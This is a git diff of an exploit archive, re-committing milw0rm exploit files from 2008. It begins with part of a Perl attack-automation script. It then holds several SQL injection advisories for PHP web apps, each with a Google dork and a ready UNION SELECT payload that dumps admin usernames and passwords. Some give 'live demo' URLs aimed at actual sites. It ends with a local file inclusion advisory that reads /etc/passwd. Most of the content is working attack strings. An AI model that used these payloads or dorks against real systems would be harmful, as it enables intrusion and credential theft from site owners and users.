modify($get_dA,$ii,$hh); + $query_p = modify($post_dA,$ii,$hh); + + $res_p = post_data($h_host_h_xdsjaop,$a_->{'sending_options'}{'path'}."?".$query_g,"application/x-www-form-urlencoded",$query_p); + foreach $a (@{$a_->{'sending_options'}{'attack'}{'regex'}}) + { + if ($res_p =~m/$a_->{'sending_options'}{'attack'}{'regex'}[$h][0]/) + { + return 1; + } + else + { + 
return 0; + } + $h++; + } + } + } + sub modify($$$) + { + $string = shift; + $replace_by = shift; + $replace_by1 = shift; + + if ($string !~/\$i/ && $string !~/\$h/) { + return $string; + } elsif ($string !~/\$i/) + { + $ff = substr($string,0,index($string,"\$h")); + $ee = substr($string,rindex($string,"\$h")+2); + $string = $ff.$replace_by1.$ee; + + return $string; + } elsif ($string !~/\$h/) + { + $f = substr($string,0,index($string,"\$i")); + $e = substr($string,rindex($string,"\$i")+2); + $string = $f.$replace_by.$e; + return $string; + } else + { + $f = substr($string,0,index($string,"\$i")); + $e = substr($string,rindex($string,"\$i")+2); + $string = $f.$replace_by.$e; + + $ff = substr($string,0,index($string,"\$h")); + $ee = substr($string,rindex($string,"\$h")+2); + $string = $ff.$replace_by1.$ee; + + return $string; + } + } + sub get_d_p_s + { + $k = 0; + $v = 0; + $g_d_p_s = shift; + + @post = (); + @get = (); + + $post_data = ""; + $get_data = ""; + $header_data = ""; + %header_dA = (); + $p = ""; + $g = ""; + while (($k,$v) = each(%{$a_->{'sending_options'}{'attack'}})) + { + if ($a_->{'sending_options'}{'attack'}{$k}[0] =~/post/) + { + $p .= $a_->{'sending_options'}{'attack'}{$k}[1]."=".$a_->{'sending_options'}{'attack'}{$k}[2]."&"; + } elsif ($a_->{'sending_options'}{'attack'}{$k}[0] =~/get/) { + $g .= $a_->{'sending_options'}{'attack'}{$k}[1]."=".$a_->{'sending_options'}{'attack'}{$k}[2]."&"; + } elsif ($a_->{'sending_options'}{'attack'}{$k}[0] =~ "header") + { + $header_dA{$a_->{'sending_options'}{'attack'}{$k}[1]} = $a_->{'sending_options'}{'attack'}{$k}[2]; + } + } + if ($g_d_p_s eq "get") + { + return $g; + } + elsif ($g_d_p_s eq "post") + { + return $p; + } elsif ($g_d_p_s eq "header") + { + return %header_dA; + } + + @a_ = (); + } + sub get_data + { + $h_host_h_xdsjaop = shift; + $h_path_h_xdsjaop = shift; + %hash = get_d_p_s("header"); + while (($u,$c) = each(%hash)) + { + $ua->default_headers->push_header($u => $c); + } + $req = 
$ua->get($h_host_h_xdsjaop.":".$a_->{'sending_options'}{'port'}.$h_path_h_xdsjaop); + return $req->content; + } + sub post_data + { + $h_host_h_xdsjaop = shift; + $h_path_h_xdsjaop = shift; + $content_type = shift; + $send = shift; + %hash = get_d_p_s("header"); + while (($u,$c) = each(%hash)) + { + $ua->default_headers->push_header($u => $c); + } + $req = HTTP::Request->new(POST => $h_host_h_xdsjaop.":".$a_->{'sending_options'}{'port'}.$h_path_h_xdsjaop); + $req->content_type($content_type); + $req->content($send); + $res = $ua->request($req); + return $res->content; + } + +} + +# milw0rm.com [2008-07-16] diff --git a/platforms/php/webapps/6086.txt b/platforms/php/webapps/6086.txt index 537eac94d..e5f3769e6 100755 --- a/platforms/php/webapps/6086.txt +++ b/platforms/php/webapps/6086.txt 
@@ -1,23 +1,23 @@ -/---------------------------------------------------------------\ -\ / -/ Joomla Component DT Register Remote SQL injection \ -\ / -\---------------------------------------------------------------/ - - -[*] Author : His0k4 [ALGERIAN HaCkeR] - -[*] Dork : inurl:com_DTRegister eventId - -[*] Vendor : http://www.dthdevelopment.com/components/dt-register.html - -[*] POC : http://[TARGET]/[Path]/index.php?option=com_dtregister&eventId={SQL} - -[*] Example : http://[TARGET]/[Path]/index.php?option=com_dtregister&eventId=-12 UNION SELECT concat(username,0x3a,password) FROM jos_users&task=pay_options&Itemid=138 - -[*] Greetings : All friends & muslims HaCkeRs - www.dz-secure.com - ----------------------------------------------------------------------------- - -# milw0rm.com [2008-07-16] +/---------------------------------------------------------------\ +\ / +/ Joomla Component DT Register Remote SQL injection \ +\ / +\---------------------------------------------------------------/ + + +[*] Author : His0k4 [ALGERIAN HaCkeR] + +[*] Dork : inurl:com_DTRegister eventId + +[*] Vendor : http://www.dthdevelopment.com/components/dt-register.html + +[*] POC : http://[TARGET]/[Path]/index.php?option=com_dtregister&eventId={SQL} + +[*] Example : http://[TARGET]/[Path]/index.php?option=com_dtregister&eventId=-12 UNION SELECT concat(username,0x3a,password) FROM jos_users&task=pay_options&Itemid=138 + +[*] Greetings : All friends & muslims HaCkeRs + www.dz-secure.com + +---------------------------------------------------------------------------- + +# milw0rm.com [2008-07-16] diff --git a/platforms/php/webapps/6087.txt b/platforms/php/webapps/6087.txt index d682bd916..8ea55565e 100755 --- a/platforms/php/webapps/6087.txt +++ b/platforms/php/webapps/6087.txt 
@@ -1,54 +1,54 @@ -|___________________________________________________| -| -|AlstraSoft Affiliate Network Pro (pgm) Remote SQL Injection Vulnerability -| -|___________________________________________________ -|---------------------Hussin X----------------------| -| -| Author: Hussin X -| -| Home : www.tryag.cc/cc -| -| email: darkangel_g85[at]Yahoo[DoT]com -| -| -|___________________________________________________ -| | -| -| -| script : http://www.alstrasoft.com/affiliate.htm -| -| DorK : "Affiliate Network Pro" -| DorK : inurl:"index.php?Act=directory" -| -|___________________________________________________| - -Exploit: - - -www.[target].com/Script/index.php?Act=directory&joinstatus=pgmwise&pgm=-1+union+select+1,2,3,concat_ws(0x3a,admin_login,admin_password),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61+from+partners_admin-- - -Exploit 2 : - -www.[target].com/Script/index.php?Act=directory&joinstatus=pgmwise&pgm=-1+union+select+1,2,3,concat_ws(0x3a,admin_login,admin_password),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45+from+partners_admin-- - -_____________ -column_name - -login -passwd -_____________ - - - -____________________________( Greetz )____________________________ -| -| tryag.cc | DeViL iRaQ | IRAQ DiveR | IRAQ_JAGUR | str0ke -| -| Iraqihack | FAHD | mos_chori | Silic0n -|_________________________________________________________________ - - - Im IRAQi - -# milw0rm.com [2008-07-16] +|___________________________________________________| +| +|AlstraSoft Affiliate Network Pro (pgm) Remote SQL Injection Vulnerability +| +|___________________________________________________ +|---------------------Hussin X----------------------| +| +| Author: Hussin X +| +| Home : www.tryag.cc/cc +| +| email: darkangel_g85[at]Yahoo[DoT]com +| +| 
+|___________________________________________________ +| | +| +| +| script : http://www.alstrasoft.com/affiliate.htm +| +| DorK : "Affiliate Network Pro" +| DorK : inurl:"index.php?Act=directory" +| +|___________________________________________________| + +Exploit: + + +www.[target].com/Script/index.php?Act=directory&joinstatus=pgmwise&pgm=-1+union+select+1,2,3,concat_ws(0x3a,admin_login,admin_password),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61+from+partners_admin-- + +Exploit 2 : + +www.[target].com/Script/index.php?Act=directory&joinstatus=pgmwise&pgm=-1+union+select+1,2,3,concat_ws(0x3a,admin_login,admin_password),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45+from+partners_admin-- + +_____________ +column_name + +login +passwd +_____________ + + + +____________________________( Greetz )____________________________ +| +| tryag.cc | DeViL iRaQ | IRAQ DiveR | IRAQ_JAGUR | str0ke +| +| Iraqihack | FAHD | mos_chori | Silic0n +|_________________________________________________________________ + + + Im IRAQi + +# milw0rm.com [2008-07-16] diff --git a/platforms/php/webapps/6088.txt b/platforms/php/webapps/6088.txt index 255bfb3af..75a0d2ab8 100755 --- a/platforms/php/webapps/6088.txt +++ b/platforms/php/webapps/6088.txt 
@@ -1,42 +1,42 @@ -############################################################### -#################### Viva IslaM Viva IslaM #################### -## -## Remote SQL injection Vulnerability -## -## tplSoccerSite 1.0 ( player.php id ) -## -############################################################### -############################################################### -## -## AuTh0r : Mr.SQL -## -## H0ME : WwW.PaL-HaCkEr.CoM && WwW.AtsDp.CoM/f -## -## Email : SQL@Hotmail.it -## -## SYRiAN Arab HACkErS -######################## -######################## -## -## -[[: L!VE DEMO :]]- -## -## 1) www.tpl-design.com/tplsoccersite/tampereunited/index.php?id=-1'+UNION+SELECT+0,CONCAT_WS(0x3a,PasswordUser,PasswordPassword)MrSQL,current_user,0,0+FROM+tplss_passwords/* -## 2) www.tpl-design.com/tplsoccersite/tampereunited/player.php?id=-1'+UNION+SELECT+0,0,CONCAT_WS(0x3a,PasswordUser,PasswordPassword),'MrSQL',0,0,0,0,0,0,0+FROM+tplss_passwords/* -## 3) www.tpl-design.com/tplsoccersite/tampereunited/opponent.php?opp=-1'+UNION+SELECT+CONCAT_WS(0x3a,PasswordUser,PasswordPassword),'MrSQL',0,0+FROM+tplss_passwords/* -## 4) www.tpl-design.com/tplsoccersite/tampereunited/matchdetails.php?id=-1'+UNION+SELECT+0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,CONCAT_WS(0x3a,PasswordUser,PasswordPassword),0,0,0,0,0+FROM+tplss_passwords/* -## 5) www.tpl-design.com/tplsoccersite/tampereunited/additionalpage.php?id=-1'+UNION+SELECT+CONCAT_WS(0x3a,PasswordUser,PasswordPassword),'MrSQL',0+FROM+tplss_passwords/* -## -######################## -######################## - -[[ NOTE ]]- -1 ) Download [[ tplSoccerSite 1.0 ]] http://www.tpl-design.com/download/tpl_ss_10_free.zip - -####################################################################################################### -####################################################################################################### - -(:: !Gr3E3E3E3E3E3E3TzZ! 
::)- - - :: HaCkEr_EGy :: His0k4 :: Dark MaSTer :: MoHaMeD el 3rab :: ALwHeD :: milw0rm :: MuslimS HaCkErS :: -####################################################################################################### -####################################################################################################### - -# milw0rm.com [2008-07-16] +############################################################### +#################### Viva IslaM Viva IslaM #################### +## +## Remote SQL injection Vulnerability +## +## tplSoccerSite 1.0 ( player.php id ) +## +############################################################### +############################################################### +## +## AuTh0r : Mr.SQL +## +## H0ME : WwW.PaL-HaCkEr.CoM && WwW.AtsDp.CoM/f +## +## Email : SQL@Hotmail.it +## +## SYRiAN Arab HACkErS +######################## +######################## +## +## -[[: L!VE DEMO :]]- +## +## 1) www.tpl-design.com/tplsoccersite/tampereunited/index.php?id=-1'+UNION+SELECT+0,CONCAT_WS(0x3a,PasswordUser,PasswordPassword)MrSQL,current_user,0,0+FROM+tplss_passwords/* +## 2) www.tpl-design.com/tplsoccersite/tampereunited/player.php?id=-1'+UNION+SELECT+0,0,CONCAT_WS(0x3a,PasswordUser,PasswordPassword),'MrSQL',0,0,0,0,0,0,0+FROM+tplss_passwords/* +## 3) www.tpl-design.com/tplsoccersite/tampereunited/opponent.php?opp=-1'+UNION+SELECT+CONCAT_WS(0x3a,PasswordUser,PasswordPassword),'MrSQL',0,0+FROM+tplss_passwords/* +## 4) www.tpl-design.com/tplsoccersite/tampereunited/matchdetails.php?id=-1'+UNION+SELECT+0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,CONCAT_WS(0x3a,PasswordUser,PasswordPassword),0,0,0,0,0+FROM+tplss_passwords/* +## 5) www.tpl-design.com/tplsoccersite/tampereunited/additionalpage.php?id=-1'+UNION+SELECT+CONCAT_WS(0x3a,PasswordUser,PasswordPassword),'MrSQL',0+FROM+tplss_passwords/* +## +######################## +######################## + -[[ NOTE ]]- +1 ) Download [[ tplSoccerSite 1.0 ]] 
http://www.tpl-design.com/download/tpl_ss_10_free.zip + +####################################################################################################### +####################################################################################################### + -(:: !Gr3E3E3E3E3E3E3TzZ! ::)- + + :: HaCkEr_EGy :: His0k4 :: Dark MaSTer :: MoHaMeD el 3rab :: ALwHeD :: milw0rm :: MuslimS HaCkErS :: +####################################################################################################### +####################################################################################################### + +# milw0rm.com [2008-07-16] diff --git a/platforms/php/webapps/6092.txt b/platforms/php/webapps/6092.txt index 8e12a0e6f..c7104a12b 100755 --- a/platforms/php/webapps/6092.txt +++ b/platforms/php/webapps/6092.txt 
@@ -1,87 +1,87 @@ -|___________________________________________________| -| -| Video Share Enterprise (UID) Remote SQL Injection Vulnerability -| -|___________________________________________________ -|---------------------Hussin X----------------------| -| -| Author: Hussin X -| -| Home : www.tryag.cc/cc -| -| email: darkangel_g85[at]Yahoo[DoT]com -| -| -|___________________________________________________ -| | -| -| -| script : http://www.alstrasoft.com/videoshare.htm -| -| DorK : Powered By AlstraSoft Video Share Enterprise -| DorK : inurl:"album.php?UID=" -| DorK : inurl:"view_picture.php?viewkey=" -|___________________________________________________| - -Exploit: - - -www.[target].com/Script/album.php?UID=-58+UNION+SELECT+1,2,version(),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31-- - - -L!VE DEMO: : - -http://www.alstrahost.com/vs/album.php?UID=-58+UNION+SELECT+1,2,version(),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31-- - -________________________ -table_name : column_name - - - adv:adv_status - adv:adv_text - adv:adv_name - adv:adv_id - audio:embed - audio:be_rated - audio:be_comment - audio:filehome - audio:rate - audio:ratedby - audio:fav_num - audio:featured - audio:com_num - audio:viewnumber - audio:vkey - audio:country - audio:location - audio:record_date - audio:adddate - audio:addtime - audio:type - audio:duration - audio:duration - audio:flvdoname - audio:vdoname - audio:channel - audio:keyword - audio:featuredesc - audio:UID - audio:description - audio:VID - -________________________ - - - -____________________________( Greetz )____________________________ -| -| tryag.cc | DeViL iRaQ | IRAQ DiveR | IRAQ_JAGUR | str0ke -| -| Iraqihack | FAHD | mos_chori | Silic0n -| -|_________________________________________________________________ - - - Im IRAQi - -# milw0rm.com [2008-07-17] +|___________________________________________________| +| +| Video Share Enterprise (UID) Remote SQL Injection 
Vulnerability +| +|___________________________________________________ +|---------------------Hussin X----------------------| +| +| Author: Hussin X +| +| Home : www.tryag.cc/cc +| +| email: darkangel_g85[at]Yahoo[DoT]com +| +| +|___________________________________________________ +| | +| +| +| script : http://www.alstrasoft.com/videoshare.htm +| +| DorK : Powered By AlstraSoft Video Share Enterprise +| DorK : inurl:"album.php?UID=" +| DorK : inurl:"view_picture.php?viewkey=" +|___________________________________________________| + +Exploit: + + +www.[target].com/Script/album.php?UID=-58+UNION+SELECT+1,2,version(),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31-- + + +L!VE DEMO: : + +http://www.alstrahost.com/vs/album.php?UID=-58+UNION+SELECT+1,2,version(),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31-- + +________________________ +table_name : column_name + + + adv:adv_status + adv:adv_text + adv:adv_name + adv:adv_id + audio:embed + audio:be_rated + audio:be_comment + audio:filehome + audio:rate + audio:ratedby + audio:fav_num + audio:featured + audio:com_num + audio:viewnumber + audio:vkey + audio:country + audio:location + audio:record_date + audio:adddate + audio:addtime + audio:type + audio:duration + audio:duration + audio:flvdoname + audio:vdoname + audio:channel + audio:keyword + audio:featuredesc + audio:UID + audio:description + audio:VID + +________________________ + + + +____________________________( Greetz )____________________________ +| +| tryag.cc | DeViL iRaQ | IRAQ DiveR | IRAQ_JAGUR | str0ke +| +| Iraqihack | FAHD | mos_chori | Silic0n +| +|_________________________________________________________________ + + + Im IRAQi + +# milw0rm.com [2008-07-17] diff --git a/platforms/php/webapps/6096.txt b/platforms/php/webapps/6096.txt index 96a858f4a..ee2610405 100755 --- a/platforms/php/webapps/6096.txt +++ b/platforms/php/webapps/6096.txt 
@@ -1,38 +1,38 @@ -############################################################### -#################### Viva IslaM Viva IslaM #################### -## -## Remote SQL injection Vulnerability -## -## preCMS v.1 ( index.php page ) -## -############################################################### -############################################################### -## -## AuTh0r : Mr.SQL -## -## H0ME : WwW.PaL-HaCkEr.CoM & WwW.AtsDp.CoM/f -## -## Email : SQL@Hotmail.it -## -## SYRIAN Arab HACkErS -######################## -######################## -## -## -[[: Exploite :]]- -## -## www.Target.com/index.php?page=UserProfil&id=-1'+union+select+1,2,concat_ws(0x3a3a,admin,nick,password),4,@@version+from+pre_user/* -## -######################## -######################## - -[[ NOTE ]]- -1 ) Download script : http://www.precoc.com/cms/preedit/file/0axee0401vk.rar - -####################################################################################################### -####################################################################################################### - -(:: !Gr3E3E3E3E3E3E3TzZ! 
::)- - - :: HaCkEr_EGy :: His0k4 :: Dark MaSTer :: MoHaMeD el 3rab :: ALwHeD :: milw0rm :: MuslimS HaCkErS :: -####################################################################################################### -####################################################################################################### - -# milw0rm.com [2008-07-17] +############################################################### +#################### Viva IslaM Viva IslaM #################### +## +## Remote SQL injection Vulnerability +## +## preCMS v.1 ( index.php page ) +## +############################################################### +############################################################### +## +## AuTh0r : Mr.SQL +## +## H0ME : WwW.PaL-HaCkEr.CoM & WwW.AtsDp.CoM/f +## +## Email : SQL@Hotmail.it +## +## SYRIAN Arab HACkErS +######################## +######################## +## +## -[[: Exploite :]]- +## +## www.Target.com/index.php?page=UserProfil&id=-1'+union+select+1,2,concat_ws(0x3a3a,admin,nick,password),4,@@version+from+pre_user/* +## +######################## +######################## + -[[ NOTE ]]- +1 ) Download script : http://www.precoc.com/cms/preedit/file/0axee0401vk.rar + +####################################################################################################### +####################################################################################################### + -(:: !Gr3E3E3E3E3E3E3TzZ! ::)- + + :: HaCkEr_EGy :: His0k4 :: Dark MaSTer :: MoHaMeD el 3rab :: ALwHeD :: milw0rm :: MuslimS HaCkErS :: +####################################################################################################### +####################################################################################################### + +# milw0rm.com [2008-07-17] diff --git a/platforms/php/webapps/6097.txt b/platforms/php/webapps/6097.txt index 06fa84f41..c2782c943 100755 --- a/platforms/php/webapps/6097.txt +++ b/platforms/php/webapps/6097.txt 
@@ -1,33 +1,33 @@ - IloveYouTryaG -|-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=| -| _ __ __ __ ______ | -| /' \ __ /'__`\ /\ \__ /'__`\ /\ ___\ | -| /\_, \ ___ /\_\/\_\L\ \ ___\ \ ,_\/\ \/\ \ _ __\ \ \__/ | -| \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ \___``\ | -| \ \ \/\ \/\ \ \ \ \/\ \L\ \/\ \__/\ \ \_\ \ \_\ \ \ \/ \/\ \L\ \ | -| \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ \ \____/ | -| \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ \/___/ | -| \ \____/ >> Kings of injection | -| \/___/ | -|-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=| -Title :: Remote SQL Injection - -Author :: QTRinu x [ Qataro (at) hotmail (dot) Com ] -Application :: Arctic Issue Tracker v2.0.0 - -Download :: http://www.arctictracker.com -Price :: $99.95 USD -Dork 1 :: Powered by Arctic v2.0.0 - -ShoutZ :: Allah ,InJecTor,AlQaTaRi,all InjEctOr5 TeaM ,TrYaG TeaM & Muslims Hackers -Terms of use :: This exploit is just for educational purposes, DO NOT use it for illegal acts. 
---------------------------------------------[C o n t e x t]----------------------------------------- - -Vulnerability: http:// Localhost / (Path Script) / index.php?filter= [SQL] - -SQL : -1%20union%20select%201,2,3,concat(username,0x3a,password),5%20from%20arctic_user%20where%20id=1-- - --------------------------------------------[End of context]---------------------------------------- -thanx str0ke/* - -# milw0rm.com [2008-07-17] + IloveYouTryaG +|-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=| +| _ __ __ __ ______ | +| /' \ __ /'__`\ /\ \__ /'__`\ /\ ___\ | +| /\_, \ ___ /\_\/\_\L\ \ ___\ \ ,_\/\ \/\ \ _ __\ \ \__/ | +| \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ \___``\ | +| \ \ \/\ \/\ \ \ \ \/\ \L\ \/\ \__/\ \ \_\ \ \_\ \ \ \/ \/\ \L\ \ | +| \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ \ \____/ | +| \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ \/___/ | +| \ \____/ >> Kings of injection | +| \/___/ | +|-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=| +Title :: Remote SQL Injection + +Author :: QTRinu x [ Qataro (at) hotmail (dot) Com ] +Application :: Arctic Issue Tracker v2.0.0 + +Download :: http://www.arctictracker.com +Price :: $99.95 USD +Dork 1 :: Powered by Arctic v2.0.0 + +ShoutZ :: Allah ,InJecTor,AlQaTaRi,all InjEctOr5 TeaM ,TrYaG TeaM & Muslims Hackers +Terms of use :: This exploit is just for educational purposes, DO NOT use it for illegal acts. +--------------------------------------------[C o n t e x t]----------------------------------------- + +Vulnerability: http:// Localhost / (Path Script) / index.php?filter= [SQL] + +SQL : -1%20union%20select%201,2,3,concat(username,0x3a,password),5%20from%20arctic_user%20where%20id=1-- + +-------------------------------------------[End of context]---------------------------------------- +thanx str0ke/* + +# milw0rm.com [2008-07-17] 
diff --git a/platforms/php/webapps/6098.txt b/platforms/php/webapps/6098.txt
index 5abf7c94b..4ac250cbf 100755
--- a/platforms/php/webapps/6098.txt
+++ b/platforms/php/webapps/6098.txt
@@ -1,39 +1,39 @@ -############################################################### -#################### Viva IslaM Viva IslaM #################### -## -## Remote SQL injection Vulnerability -## -## Aprox CMS Engine V5.1.0.4 ( index.php page ) -## -############################################################### -############################################################### -## -## AuTh0r : Mr.SQL -## -## H0ME : WwW.PaL-HaCkEr.CoM && WwW.AtsDp.CoM/f -## -## Email : SQL@Hotmail.it -## -## SYRIAN Arab HACkErS -######################## -######################## -## -## -[[: Exploite :]]- -## -## www.Target.com/index.php?id=-1'+UNION+SELECT+0,0,0,0,0,0,0,0,'MrSQL',0,password,login,0,0,0+FROM+aprox_users/* -## -######################## -######################## - -[[ NOTE ]]- -1 ) dont use the tags in the exploite most get the info without concat() -2 ) Download script : http://www.aprox.de/engine/data/files/AproxEngine_V5_1_04.zip - -####################################################################################################### -####################################################################################################### - -(:: !Gr3E3E3E3E3E3E3TzZ! 
::)- - - :: HaCkEr_EGy :: His0k4 :: Dark MaSTer :: MoHaMeD el 3rab :: ALwHeD :: milw0rm :: MuslimS HaCkErS :: -####################################################################################################### -####################################################################################################### - -# milw0rm.com [2008-07-18] +############################################################### +#################### Viva IslaM Viva IslaM #################### +## +## Remote SQL injection Vulnerability +## +## Aprox CMS Engine V5.1.0.4 ( index.php page ) +## +############################################################### +############################################################### +## +## AuTh0r : Mr.SQL +## +## H0ME : WwW.PaL-HaCkEr.CoM && WwW.AtsDp.CoM/f +## +## Email : SQL@Hotmail.it +## +## SYRIAN Arab HACkErS +######################## +######################## +## +## -[[: Exploite :]]- +## +## www.Target.com/index.php?id=-1'+UNION+SELECT+0,0,0,0,0,0,0,0,'MrSQL',0,password,login,0,0,0+FROM+aprox_users/* +## +######################## +######################## + -[[ NOTE ]]- +1 ) dont use the tags in the exploite most get the info without concat() +2 ) Download script : http://www.aprox.de/engine/data/files/AproxEngine_V5_1_04.zip + +####################################################################################################### +####################################################################################################### + -(:: !Gr3E3E3E3E3E3E3TzZ! ::)- + + :: HaCkEr_EGy :: His0k4 :: Dark MaSTer :: MoHaMeD el 3rab :: ALwHeD :: milw0rm :: MuslimS HaCkErS :: +####################################################################################################### +####################################################################################################### + +# milw0rm.com [2008-07-18] diff --git a/platforms/php/webapps/6099.txt b/platforms/php/webapps/6099.txt index 9a59643dc..d8337953c 100755 
--- a/platforms/php/webapps/6099.txt
+++ b/platforms/php/webapps/6099.txt
@@ -1,34 +1,34 @@ -################################################# -################################################# -##SQL-Injection in Siteframe CMS (all versions)## -################################################# -################################################# - -############## -#Author: n0ne############## -#E-Mail: qwerty@ebanat.com# -########################### - -############################### -#Vulnerable script: folder.php# -#Vulnerable var: id############ -#################### - -######################################## -#CMS Homepage: http://www.siteframe.org# -######################################## - -########################################################################################################################################################## -#Exploit PoC: #http://www.target.com/folder.php?id=370+and(1=2)+union+select+1,2,3,4,5,6,7,8,concat_ws(0x3a,user_email,user_passwd),10,11# #+from+users--# ######################################################################################################################## -########################################################################################################################################################## - -######################################################################################################### -#Admin panel: http://www.target.com/admin/ (but previously you gotta log in as administrator on website)# -######################################################################################################### - -################################################### -#############Greetz to www.antichat.ru############# -############And personally to Nilson ;)############ -################################################### - -# milw0rm.com [2008-07-18] +################################################# +################################################# +##SQL-Injection in Siteframe CMS (all versions)## +################################################# 
+################################################# + +############## +#Author: n0ne############## +#E-Mail: qwerty@ebanat.com# +########################### + +############################### +#Vulnerable script: folder.php# +#Vulnerable var: id############ +#################### + +######################################## +#CMS Homepage: http://www.siteframe.org# +######################################## + +########################################################################################################################################################## +#Exploit PoC: #http://www.target.com/folder.php?id=370+and(1=2)+union+select+1,2,3,4,5,6,7,8,concat_ws(0x3a,user_email,user_passwd),10,11# #+from+users--# ######################################################################################################################## +########################################################################################################################################################## + +######################################################################################################### +#Admin panel: http://www.target.com/admin/ (but previously you gotta log in as administrator on website)# +######################################################################################################### + +################################################### +#############Greetz to www.antichat.ru############# +############And personally to Nilson ;)############ +################################################### + +# milw0rm.com [2008-07-18] diff --git a/platforms/php/webapps/6102.txt b/platforms/php/webapps/6102.txt index 0b1a52069..577c490cb 100755 --- a/platforms/php/webapps/6102.txt +++ b/platforms/php/webapps/6102.txt 
@@ -1,39 +1,39 @@ -############################################################### -#################### Viva IslaM Viva IslaM #################### -## -## Remote SQL injection Vulnerability -## -## PHPFootball 1.6 ( show.php dbtable ) -## -############################################################### -############################################################### -## -## AuTh0r : Mr.SQL -## -## H0ME : WwW.PaL-HaCkEr.CoM && WwW.AtsDp.CoM/f -## -## Email : SQL@Hotmail.it -## -## SYRIAN Arab HACkErS -######################## -######################## -## -## -[[: Exploite :]]- -## -## www.Target.com/show.php?dbtable=Predictions+UNION+SELECT+0,Concat_Ws(0x3a,Username,Password)MrSQL,0,0,0+FROM+Accounts-- -## -######################## -######################## - -[: N0TE :]- -1) Download script ;D http://garr.dl.sourceforge.net/sourceforge/phpfootball/PHPfootball1.6.zip -2) Passwords Md5 - -####################################################################################################### -####################################################################################################### - -(:: !Gr3E3E3E3E3E3E3TzZ! 
::)- - - :: HaCkEr_EGy :: His0k4 :: Dark MaSTer :: MoHaMeD el 3rab :: ALwHeD :: milw0rm :: MuslimS HaCkErS :: -####################################################################################################### -####################################################################################################### - -# milw0rm.com [2008-07-20] +############################################################### +#################### Viva IslaM Viva IslaM #################### +## +## Remote SQL injection Vulnerability +## +## PHPFootball 1.6 ( show.php dbtable ) +## +############################################################### +############################################################### +## +## AuTh0r : Mr.SQL +## +## H0ME : WwW.PaL-HaCkEr.CoM && WwW.AtsDp.CoM/f +## +## Email : SQL@Hotmail.it +## +## SYRIAN Arab HACkErS +######################## +######################## +## +## -[[: Exploite :]]- +## +## www.Target.com/show.php?dbtable=Predictions+UNION+SELECT+0,Concat_Ws(0x3a,Username,Password)MrSQL,0,0,0+FROM+Accounts-- +## +######################## +######################## + -[: N0TE :]- +1) Download script ;D http://garr.dl.sourceforge.net/sourceforge/phpfootball/PHPfootball1.6.zip +2) Passwords Md5 + +####################################################################################################### +####################################################################################################### + -(:: !Gr3E3E3E3E3E3E3TzZ! ::)- + + :: HaCkEr_EGy :: His0k4 :: Dark MaSTer :: MoHaMeD el 3rab :: ALwHeD :: milw0rm :: MuslimS HaCkErS :: +####################################################################################################### +####################################################################################################### + +# milw0rm.com [2008-07-20] diff --git a/platforms/php/webapps/6107.txt b/platforms/php/webapps/6107.txt index 474a143da..aa60ba911 100755 --- a/platforms/php/webapps/6107.txt 
+++ b/platforms/php/webapps/6107.txt 
@@ -1,65 +1,65 @@ -Digital Security Research Group [DSecRG] Advisory #DSECRG-08-31 - - -Application: Interact E-Learning System -Versions Affected: 2.4.1 -Vendor URL: http://sourceforge.net/projects/cce-interact -Bug: Local File Include -Exploits: YES -Reported: 03.07.2008 -Vendor response: 04.07.2008 -Solution: YES -Date of Public Advisory: 21.07.2008 -Authors: Digital Security Research Group [DSecRG] (research [at] dsec [dot] ru) - - - -Description -*********** - -Interact E-Learning System system has local file include vulnerability in script help/help.php - -Vulnerable GET parameters "module", "file". - -Code -**** -################################################# - -$module = isset($_GET['module']) ? $_GET['module']:''; -$file = isset($_GET['file']) ? $_GET['file']:''; - -... - -$hpath=$CONFIG['BASE_PATH'].'/language/'.$_SESSION['language'].'/help/'.$module.'/'.$file; -if (is_file($hpath)){ - require_once($hpath); -} else { - require_once($CONFIG['BASE_PATH'].'/language/default/help/'.$module.'/'.$file); -} - -################################################# - -Example: - -http://[server]/[installdir]/help/help.php?module=../../../../../../../../../../../../../etc/passwd%00 -http://[server]/[installdir]/help/help.php?file=../../../../../../../../../../../../../etc/passwd - - - -Solution -******** - -This file is no longer required by the system. Remove it from installation. - -Vendor response: - -"I have posted an alert to users to remove this from their installations asap and will get it removed from the 